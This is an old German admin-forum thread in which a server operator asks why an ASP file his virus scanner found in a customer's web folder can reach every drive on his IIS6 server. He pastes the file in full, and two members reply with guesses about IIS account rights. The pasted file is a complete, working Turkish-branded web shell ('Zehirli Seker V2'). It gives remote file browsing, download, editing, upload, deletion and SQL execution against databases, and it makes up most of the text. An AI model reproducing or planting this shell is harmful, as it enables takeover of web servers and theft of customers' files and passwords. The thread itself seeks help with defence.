Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

IIS6 Sicherheitsproblem

Frage Microsoft Windows Server

Mitglied: maddin70

maddin70 (Level 1) - Jetzt verbinden

12.07.2006, aktualisiert 20:08 Uhr, 4866 Aufrufe, 3 Kommentare

mein server-virenscanner hat in einem meiner kundenwebs ein asp-script entdeckt, mit dem man via web auf alle verzeichnisse und
dateien des servers zugreifen kann.
hab ich hier irgendwo was falsch eingestellt oder ist das noch ein
sicherheitsproblem des IIS?
berechtigt für den webordner und die datei sind das IUSR_serverxxx konto und trotzdem
komme ich auf alle laufwerke des rechners, kann sogar asp-code anderer kundenwebs meines server ansehen und sogar die original asp-datei runterladen (somit auch passwörter von eventuellen mysql-cannects).....

server ist win2003/sp1 alle sicherheitsupdates sind installiert.

hier dir code (dateiname zehir2.asp)

<%
on error resume next
Dim objFSO
Set objFSO = CreateObject ("Scripting.FileSystemObject")
dosyaPath = "Zehir2.asp"
status = Request("status")
path = Request("path")
dPath = Request("dPath")
arama = Request("txArama")
dkayit = Request("dkayit")
table = Request("table")
del = Request("del")
strSQL = Request("strSQL")
pathfile = request("pathfile")
'////////////////////////////
Function ReadBinaryFile(FileName)
Const adTypeBinary = 1
Dim BinaryStream
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.LoadFromFile FileName
ReadBinaryFile = BinaryStream.Read
End Function
if status="-3" then
Response.Buffer=True
Set Fil = objFSO.GetFile(pathfile)

Response.contenttype="application/force-download"
Response.AddHeader "Cache-control","private"
Response.AddHeader "Content-Length", Fil.Size
Response.AddHeader "Content-Disposition", "attachment; filename=" &
Fil.name

Response.BinaryWrite readBinaryFile(Fil.path)
Set f = Nothing: Set Fil = Nothing
response.End()
end if
'////////////////////////////
Class FileUploader
Public Files
Private mcolFormElem

Private Sub Class_Initialize()
Set Files = Server.CreateObject("Scripting.Dictionary")
Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
End Sub

Private Sub Class_Terminate()
If IsObject(Files) Then
Files.RemoveAll()
Set Files = Nothing
End If
If IsObject(mcolFormElem) Then
mcolFormElem.RemoveAll()
Set mcolFormElem = Nothing
End If
End Sub

Public Property Get Form(sIndex)
Form = ""
If mcolFormElem.Exists(LCase(sIndex)) Then Form =
mcolFormElem.Item(LCase(sIndex))
End Property

Public Default Sub Upload()
Dim biData, sInputName
Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
Dim nPosFile, nPosBound

biData = Request.BinaryRead(Request.TotalBytes)
nPosBegin = 1
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))

If (nPosEnd-nPosBegin) <= 0 Then Exit Sub

vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
nDataBoundPos = InstrB(1, biData, vDataBounds)

Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))

nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
nPos = InstrB(nPos, biData, CByteString("name="))
nPosBegin = nPos + 6
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
nPosBound = InstrB(nPosEnd, biData, vDataBounds)

If nPosFile <> 0 And nPosFile < nPosBound Then
Dim oUploadFile, sFileName
Set oUploadFile = New UploadedFile

nPosBegin = nPosFile + 10
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
oUploadFile.FileName = Right(sFileName,
Len(sFileName)-InStrRev(sFileName, "\"))

nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
nPosBegin = nPos + 14
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))

oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin,
nPosEnd-nPosBegin))

nPosBegin = nPosEnd+4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)

If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName),
oUploadFile
Else
nPos = InstrB(nPos, biData, CByteString(Chr(13)))
nPosBegin = nPos + 4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add
LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
End If

nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData,
vDataBounds)
Loop
End Sub

'String to byte string conversion
Private Function CByteString(sString)
Dim nIndex
For nIndex = 1 to Len(sString)
CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
Next
End Function

'Byte string to string conversion
Private Function CWideString(bsString)
Dim nIndex
CWideString =""
For nIndex = 1 to LenB(bsString)
CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1)))
Next
End Function
End Class

Function BinaryToString(Binary)
dim cl1, cl2, cl3, pl1, pl2, pl3
Dim L
cl1 = 1
cl2 = 1
cl3 = 1
L = LenB(Binary)
Do While cl1<=L
pl3 = pl3 & Chr(AscB(MidB(Binary,cl1,1)))
cl1 = cl1 + 1
cl3 = cl3 + 1
if cl3>300 then
pl2 = pl2 & pl3
pl3 = ""
cl3 = 1
cl2 = cl2 + 1
if cl2>200 then
pl1 = pl1 & pl2
pl2 = ""
cl2 = 1
End If
End If
Loop
BinaryToString = pl1 & pl2 & pl3
End Function

Class UploadedFile
Public ContentType
Public FileName
Public FileData

Public Property Get FileSize()
FileSize = LenB(FileData)
End Property

Public Sub SaveToDisk(sPath)
Dim oFS, oFile
Dim nIndex

If sPath = "" Or FileName = "" Then Exit Sub
If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"

Set oFS = Server.CreateObject("Scripting.FileSystemObject")
If Not oFS.FolderExists(sPath) Then Exit Sub

Set oFile = oFS.CreateTextFile(sPath & FileName, True)

For nIndex = 1 to LenB(FileData)
oFile.Write Chr(AscB(MidB(FileData,nIndex,1)))
Next

oFile.Close
End Sub

Public Sub SaveToDatabase(ByRef oField)
If LenB(FileData) = 0 Then Exit Sub

If IsObject(oField) Then
oField.AppendChunk FileData
End If
End Sub

End Class

if status="-4" then
Dim Uploader, File
Set Uploader = New FileUploader
Uploader.Upload()
Response.Write "Dosya gönderilmiþtir" & Uploader.Form("fullname") &
"

"
If Uploader.Files.Count = 0 Then
Response.Write "Hiç Dosya Upload Edilemedi."
Else
For Each File In Uploader.Files.Items
File.FileName = request.Form("FNAME")
If Uploader.Form("saveto") = "disk" Then
File.SaveToDisk path
End If
Response.Write "Dosya Adý : " & File.FileName & "
"
Response.Write "Dosya Boyutu : " & File.FileSize & " bytes

"
Next
End If
Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time
end if
'////////////////////////////
sub araBul(path_,ara_)
on error resume next
If Len(path_) > 0 Then
cur = path_&"\"
If cur = "\\" Then cur = ""
parent = ""
If InStrRev(cur,"\") > 0 Then
parent = Left(cur, InStrRev(cur, "\", Len(cur)-1))
End If
Else
cur = ""
End If

Set f = objFSO.GetFolder(cur)

Set fc = f.Files
For Each f1 In fc
if lcase(Right(f1.name,len(ara_)))=lcase(ara_) then
downStr = "<font face=webdings size=5><a
href='"&dosyapath&"?status=-3&pathFile="&f1.path&"&Time="&time&"'>Í</a></font>"
if lcase(ara_)="mdb" then
Response.Write downStr&"<font face=wingdings size=5><a
href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a></font>
  • <a
href='"&dosyapath&"?status=7&path="&f1.path&"&Time="&time&"'>"&f1.path&"
["&f1.size&"]"&"</a></b>
"
else
Response.Write downStr&"<font face=wingdings size=5><a
href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a><a
href='"&dosyapath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a></font>
- <a
href='"&dosyapath&"?status=5&path="&f1.path&"&Time="&time&"'>"&f1.path&"
["&f1.size&"]"&"</a></b>
"
end if
end if
Next

Set fs = f.SubFolders
For Each f1 In fs
araBul f1.path,ara_
Next
Set f = Nothing
Set fc = Nothing
Set fs = Nothing
end sub
%>
<body bgcolor=black text=Chartreuse link=Chartreuse alink=Chartreuse
vlink=Chartreuse>
<pre><center><p><font face="Times New Roman, Times, serif"
size="3">Zehirli Þeker V2</font>


POWERED BY ZEHIR HACKER
IP/Cyber-WARRiOR Team</p><p><font face="Times New Roman, Times,
serif" size="3">Akýncýlar Grubu</font>

<a href="http://www.Cyber-Warrior.Org;>illegalPort.com</a>" / <a
href="http://www.Cyber-Warrior.Org;>Cyber-WARRiOR.Org</a></p ..."
<script language=javascript>
var dosyaPath = "<%=dosyaPath%>"
DRIVE ISLEMLERI
function driveGo(drive_){
location = dosyaPath+"?status=1&path="+drive_+"&Time="+Date()
}
</script>
<%
Response.Write "<table border=1 width=85% cellpadding=0 cellspacing=0><tr
bgcolor=gray><td colspan=2 align=center><font color=white>Sistem
Bilgileri</td></tr>"
Response.Write "<tr><td>Local Adres</td><td> " &
request.servervariables("REMOTE_ADDR") & "</td></tr>"
Response.Write "<tr><td>User Agent</td><td> " &
request.servervariables("HTTP_USER_AGENT") & "</td></tr>"
Response.Write "<tr><td>Server</td><td> " &
request.servervariables("SERVER_NAME") & "</td></tr>"
Response.Write "<tr><td>IP</td><td> " &
request.servervariables("LOCAL_ADDR") & "</td></tr>"
Response.Write "<tr><td>HTTPD</td><td> " &
request.servervariables("SERVER_SOFTWARE") & "</td></tr>"
Response.Write "<tr><td>Port</td><td> " &
request.servervariables("SERVER_PORT") & "</td></tr>"
Response.Write "<tr><td>Yol</td><td> " &
request.servervariables("APPL_PHYSICAL_PATH") & "</td></tr>"
Response.Write "<tr><td>Log Root</td><td> " &
request.servervariables("APPL_MD_PATH") & "</td></tr>"
Response.Write "<tr><td>HTTPS</td><td> " & request.servervariables("HTTPS")
& "</td></tr>"
Response.Write "</table>
"

Response.Write "<table align=center border=1 width=150 cellpadding=0
cellspacing=0><tr bgcolor=gray><td align=center><b><font
color=white>Tipi</td><td align=center><b><font color=white>Sürücü</td></tr>"
for each drive_ in objFSO.Drives
Response.Write "<tr><td>"
if drive_.Drivetype=1 then Response.write "Floppy"
if drive_.Drivetype=2 then Response.write "HardDisk"
if drive_.Drivetype=3 then Response.write "Remote HDD"
if drive_.Drivetype=4 then Response.write "CD-Rom"
Response.Write "</td><td align=center>"
Response.write "<input style='width:50%'
onClick=""driveGo('"&drive_.DriveLetter&"');"" type=button
value='"&drive_.DriveLetter&"'>"
Response.Write "</td></tr>"
next
Response.Write "</table>
"

Response.Write "<form method=get action='"&DosyPath&"'>"
Response.Write "<table border=1 cellpadding=0 cellspacing=0
align=center><tr><td align=center bgcolor=gray>Hýzlý
Eriþim</td></tr><tr><td>"
Response.Write "<input type=hidden value='2' name=status><input type=hidden
value='"&time&"' name=Time>"
Response.Write "<input style='width:350' value='"&Path&"' name=Path><input
type=submit value='Git' id=submit1 name=submit1>"
Response.Write "</td></tr></table></form>
"

sub aramaUpload
Response.Write "<form method=get action='"&DosyPath&"'>"
Response.Write "<table border=1 cellpadding=0 cellspacing=0
align=center><tr><td align=center bgcolor=gray>Arama</td></tr><tr><td>"
Response.Write "<input type=hidden value='12' name=status><input type=hidden
value='"&time&"' name=Time>"
Response.Write "<input type=hidden value='"&Path&"' name=Path><input
style='width:350' value='mdb' name=txArama><input type=submit value='Git'>"
Response.Write "</td></tr></table></form>
"

Response.Write "<FORM METHOD='POST' ENCTYPE='multipart/form-data'
ACTION='"&DosyaPath&"?status=-4&Time="&time&"&Path="&path&"'>"
Response.Write "<table border=1 cellpadding=0 cellspacing=0
align=center><tr><td align=center bgcolor=gray>Dosya Upload</td></tr><tr><td
align=center>"
Response.Write "<INPUT TYPE=HIDDEN NAME='FULLNAME' VALUE='ZEHIR'>"
Response.Write "<INPUT TYPE=HIDDEN NAME='saveto' VALUE='disk'>"
Response.Write "<input style='width:350' type=File name=FILE1>"
Response.Write "
<INPUT TYPE=TEXT style='width:285' NAME='FNAME'
VALUE='ZEHIR.TXT'>"
response.Write "<input type=submit value='Upload'>"
Response.Write "</td></tr></table></form>
"
Response.Write "</center>"
end sub

SELECT CASE status
CASE 1 'Driver Open
aramaUpload
Response.Write "<table width=100% ><tr>"
Path = Path & ":/"
Response.Write "<td valign=top>"
KlasorOku
Response.Write "</td><td valign=top align=right>"
DosyaOku
Response.Write "</td>"
CASE 2 'Normal listeleme
aramaUpload
Response.Write "<table width=100% ><tr>"
Response.Write "<td valign=top>"
KlasorOku
Response.Write "</td><td valign=top align=right>"
DosyaOku
Response.Write "</td>"
CASE 3 'File Delete
objFSO.DeleteFile del
Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time
CASE 4 'Folder Delete
objFSO.DeleteFolder del
Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time
CASE 5 'Dosya içeriðini görüntüle
Response.Write "<table width=100% ><tr>"
set f = objFSO.OpenTextFile(path,1)
Response.Write "<pre>"&f.readAll&"</pre>"
if err.number=62 then Response.Write "<script language=javascript>alert('Bu
Dosya Okunamýyor\nSistem dosyasý olabilir')</script>":Response.End
CASE 6 'Resim aç
Response.Write "<center><img ALT='IP HACK TEAM'
src='"&resimYol(path)&"'></center>"
CASE 7 'database tablo listele
Response.Write "<form method=get action='"&DosyPath&"' id=form1
name=form1>"
Response.Write "<table border=1 cellpadding=0 cellspacing=0
align=center><tr><td align=center bgcolor=gray>SQL
Çalýþtýr</td></tr><tr><td>"
Response.Write "<input type=hidden value='9' name=status><input type=hidden
value='"&path&"' name=path><input type=hidden value='"&time&"' name=Time>"
Response.Write "<input style='width:350' value='' name=strSQL><input
type=submit value='Çalýþtýr' id=submit1 name=submit1>"
Response.Write "</td></tr></table></form>
"

Response.Write "<b><font size=3>Tablolar</font></br>
"
Set objConn = Server.CreateObject("ADODB.Connection")
Set objADOX = Server.CreateObject("ADOX.Catalog")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = Path
objConn.Open
objADOX.ActiveConnection = objConn

For Each table in objADOX.Tables
If table.Type = "TABLE" Then
Response.Write "<font face=wingdings size=5>4</font> <a
href='"&dosyaPath&"?status=8&Path="&path&"&table="&table.Name&"&time="&time&"'>"&table.Name&"</a>
"
End If
Next
CASE 8 'database kayýt listele
Response.Write "<form method=get action='"&DosyPath&"' id=form1
name=form1>"
Response.Write "<table border=1 cellpadding=0 cellspacing=0
align=center><tr><td align=center bgcolor=gray>SQL
Çalýþtýr</td></tr><tr><td>"
Response.Write "<input type=hidden value='9' name=status><input type=hidden
value='"&path&"' name=path><input type=hidden value='"&time&"' name=Time>"
Response.Write "<input style='width:350' value='' name=strSQL><input
type=submit value='Çalýþtýr' id=submit1 name=submit1>"
Response.Write "</td></tr></table></form>
"

Set objConn = Server.CreateObject("ADODB.Connection")
Set objRcs = Server.CreateObject("ADODB.RecordSet")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = Path
objConn.Open
objRcs.Open table,objConn, adOpenKeyset , , adCmdText

Response.Write "<table border=1 cellpadding=2 cellspacing=0
bordercolor=543152><tr bgcolor=silver>"
for i=0 to objRcs.Fields.count-1
Response.Write "<td><font
color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"
next
Response.Write "</tr>"
do while not objRcs.EOF
Response.Write "<tr>"
for i=0 to objRcs.Fields.count-1
Response.Write "<td>"&objRcs.Fields(i).Value&"</td>"
next
Response.Write "</tr>"
objRcs.MoveNext
loop
Response.Write "</table>"
CASE 9 'SQL Execute
Set objConn = Server.CreateObject("ADODB.Connection")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = Path
objConn.Open
objConn.Execute strSQL
Response.Redirect dosyaPath&"?status=7&Path="&Path&"&Time="&time
CASE 10 'Dosya Editleme
set f = objFSO.OpenTextFile(dPath,1)
Response.Write "<center><form action='"&DosyPath&"?Time="&time&"'
method=post>"
Response.Write "<input type=hidden name=status value='11'>"
Response.Write "<input type=hidden name=dPath value='"&dPath&"'>"
Response.Write "<input type=hidden name=Path value='"&Path &"'>"
Response.Write "<input type=submit value=Kaydet>
"
Response.Write "<textarea name=dkayit style='width:90%;height:350'>"
Response.Write server.HTMLEncode(f.readAll)
Response.Write "</textarea></form></center>"
CASE 11 'Dosya Kayýt
set saveTextFile = objFSO.OpenTextFile(dPath,2,true,false)
saveTextFile.Write(dkayit)
saveTextFile.close
Response.Redirect dosyaPath&"?status=2&path="&path&"&time="&time
CASE 12 'Dosya Arama
aramaUpload
araBul path,arama
END SELECT
Response.Write "</tr></table>"

sub DosyaOku
Set f = objFSO.GetFolder(Path)
Set fc = f.Files
For Each f1 In fc
dosyaAdi = f1.name
num = InStrRev(dosyaAdi,".")
uzanti = lcase(Right(dosyaAdi,len(dosyaAdi)-num))
downStr = "<font face=webdings><a
href='"&dosyaPath&"?status=-3&PathFile="&f1.path&"&Time="&time&"'>Í</a></font>"
select case uzanti
case "mdb"
Response.Write "<a
href='"&dosyaPath&"?status=7&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a>

<font face=wingdings size=5>M <a
href='"&dosyaPath&"?status=3&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a>"&downStr&"</font>
"
case "asp"
Response.Write "<a
href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b>
<font face=wingdings size=5>± <a
href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a><a
href='"&dosyaPath&"?status=3&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a>"&downStr&"</font>
"
case "jpg","gif"
Response.Write "<a
href='"&dosyaPath&"?status=6&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b>
<font face=webdings size=5>¢</font><font face=wingdings size=5> <a
href='"&dosyaPath&"?status=3&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a>"&downStr&"</font>
"
case else
Response.Write "<a
href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b>
<font face=wingdings size=5>2 <a
href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a><a
href='"&dosyaPath&"?status=3&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a>"&downStr&"</font>
"
end select
Next
end sub

sub KlasorOku
Set f = objFSO.GetFolder(Path)
Set fc = f.SubFolders
For Each f1 In fc
Response.Write "<font face=wingdings size=5><a
href='"&dosyaPath&"?status=4&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a>
1</font> <a
href='"&dosyaPath&"?status=2&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a>

"
Next
end sub

function resimYol(path_)
anayol = request.servervariables("APPL_PHYSICAL_PATH")
num = InStrRev(anayol,"\")
dim i,k,yollar,geriyol,girdimi
i=0
k=0
girdimi=false
while num>0
anayol = left(anayol,num-1)
geriyol = geriyol & "../"
num = InStrRev(anayol,"\")
girdimi=true
wend
'if girdimi=true then geriyol = left(geriyol,len(geriyol)-3)

path_ = Replace(path_,"\","/")
path_ = Replace(path_,"
","/")
path_ = Replace(path_," ;","/")
path_ = Replace(path_,"
","/")
path_ = Replace(path_," ;","/")

num = InStr(1,path_,"/")
while num>0
folder = left(path_,num-1)
path_ = Right(path_,len(path_)-num)
if k<>0 then
yollar = yollar & "/" & folder
end if
num = InStr(1,path_,"/")
k = k + 1
wend

resimYol = Replace(geriyol & yollar & "/" & path_,"
","/")
end function
Set fc = Nothing
Set objFSO = Nothing
Response.End
%>
Mitglied: Raphael
12.07.2006 um 14:44 Uhr
wie hast du getestet obs "funktioniert"?
Falls du das Script nicht in ein öffentliches Verzeichnis sondern in ein "geschützes" verzeichnis kopiert hast zum testen, dann hast du nicht die Rechte des öffentlichen Users sondern die Rechte des Users mit dem du dich eingelogt hast.
könnte an dem liegen.

kind regards
Bitte warten ..
Mitglied: maddin70
12.07.2006 um 14:52 Uhr
ich hab das file in ein öffentliches webverzeichnis gelegt, also mit www.xxx.xx/xxx.asp zum aufrufen. die öffentlichen ordner haben bei mir aber nur die IUSR_server- rechte. das ist ja der witz. brauchst nur mal das script in deinem space ablegen und testen.....
Bitte warten ..
Mitglied: Raphael
12.07.2006 um 20:08 Uhr
es gibt ja 2 Accounts für den IIS .. eines unter dem der IIS selber läuft und ein "anonymes" für den Besucher quasi ...
Evtl. hat der IIS-Account zuviele Rechte ...
oder hast du irgend ein Laufwerk für "everbody", bzw. "jeder" (bei deutschem Windows) freigegeben?

ansonsten kann ich's mir grad nicht erklären wie's gehen soll. Ich mag das Script bei mir nicht ausprobieren ;) (wirst du hoffentlich verstehen)
Bitte warten ..
Neuester Wissensbeitrag
Windows 10

Powershell 5 BSOD

(3)

Tipp von agowa338 zum Thema Windows 10 ...

Heiß diskutierte Inhalte
LAN, WAN, Wireless
gelöst Server erkennt Client nicht wenn er ausserhalb des DHCP Pools liegt (28)

Frage von Mar-west zum Thema LAN, WAN, Wireless ...

Outlook & Mail
Outlook 2010 findet ost datei nicht (18)

Frage von Floh21 zum Thema Outlook & Mail ...

Windows Server
Server 2008R2 startet nicht mehr (Bad Patch 0xa) (18)

Frage von Haures zum Thema Windows Server ...